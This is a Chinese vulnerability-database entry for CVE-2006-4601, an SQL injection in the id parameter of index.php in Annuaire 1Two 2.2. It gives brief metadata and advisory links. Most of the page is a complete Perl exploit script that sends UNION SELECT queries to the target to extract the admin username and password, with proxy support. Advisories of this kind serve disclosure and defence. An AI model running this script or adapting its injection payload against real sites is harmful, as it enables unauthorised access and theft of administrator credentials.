Annuaire 1Two 'Index.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110938 漏洞类型 SQL注入
发布时间 2006-09-02 更新时间 2006-09-13
CVE编号 CVE-2006-4601 CNNVD-ID CNNVD-200609-082
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2289
https://cxsecurity.com/issue/WLB-2006090024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-082
|漏洞详情
Annuaire1Two2.2的index.php中的SQL注入漏洞,远程攻击者可以通过id参数执行任意SQL命令。
|漏洞EXP
#!/usr/bin/perl
#
# Affected.scr..: Annuaire 1Two 2.2
# Poc.ID........: 09060902.txt
# Type..........: SQL Injection (without quote)
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: http://www.1two.org/
# Poc.link......: acid-root.new.fr/poc/09060902.txt
# Credits.......: DarkFig
#
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;


print STDOUT "\n+", '-' x 53, "+\n";
print STDOUT "|    Annuaire 1Two 2.2 Remote SQL Injection Exploit   |\n";
print STDOUT '+', '-' x 53, "+\n";

my($host,$path,$proxh,$proxu,$proxp,);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);
   
if(!$host) {
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options]    |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT '+', '-' x 53, "+\n";
    exit(0);
}

if(!$path) {$path  = '/';}
if($host  !~ /http/) {$host  = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

my @fi = ('username', 'password');
my $ur = $host.$path.'index.php?id=';
my $ua = LWP::UserAgent->new();
   $ua->agent('Mozilla XD');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {
my $xx = $_;
my $re = HTTP::Request->new(GET =>  $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $xd = $ua->request($re);
my $da = $xd->content;

if($da =~ /- (.*?)<\/title>/) {
      if($xx eq 'username') {
            print STDOUT " [+]User:";}
      if($xx eq 'password') {
            print STDOUT " [+]Passwd:";}
      print STDOUT " $1\n";
} else {
  print STDOUT "[!]Exploit failed\n";
}}
print STDOUT "+", '-' x 53, "+\n";
exit(0);

# milw0rm.com [2006-09-02]
|参考资料

来源:XF
名称:annuaire-1two-index-sql-injection(28730)
链接:http://xforce.iss.net/xforce/xfdb/28730
来源:BID
名称:19817
链接:http://www.securityfocus.com/bid/19817
来源:BUGTRAQ
名称:20060902Annuaire1Two2.2RemoteSQLInjectionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/445010/100/0/threaded
来源:VUPEN
名称:ADV-2006-3440
链接:http://www.frsirt.com/english/advisories/2006/3440
来源:SECUNIA
名称:21734
链接:http://secunia.com/advisories/21734
来源:MISC
链接:http://acid-root.new.fr/poc/09060902.txt
来源:SREASON
名称:1496
链接:http://securityreason.com/securityalert/1496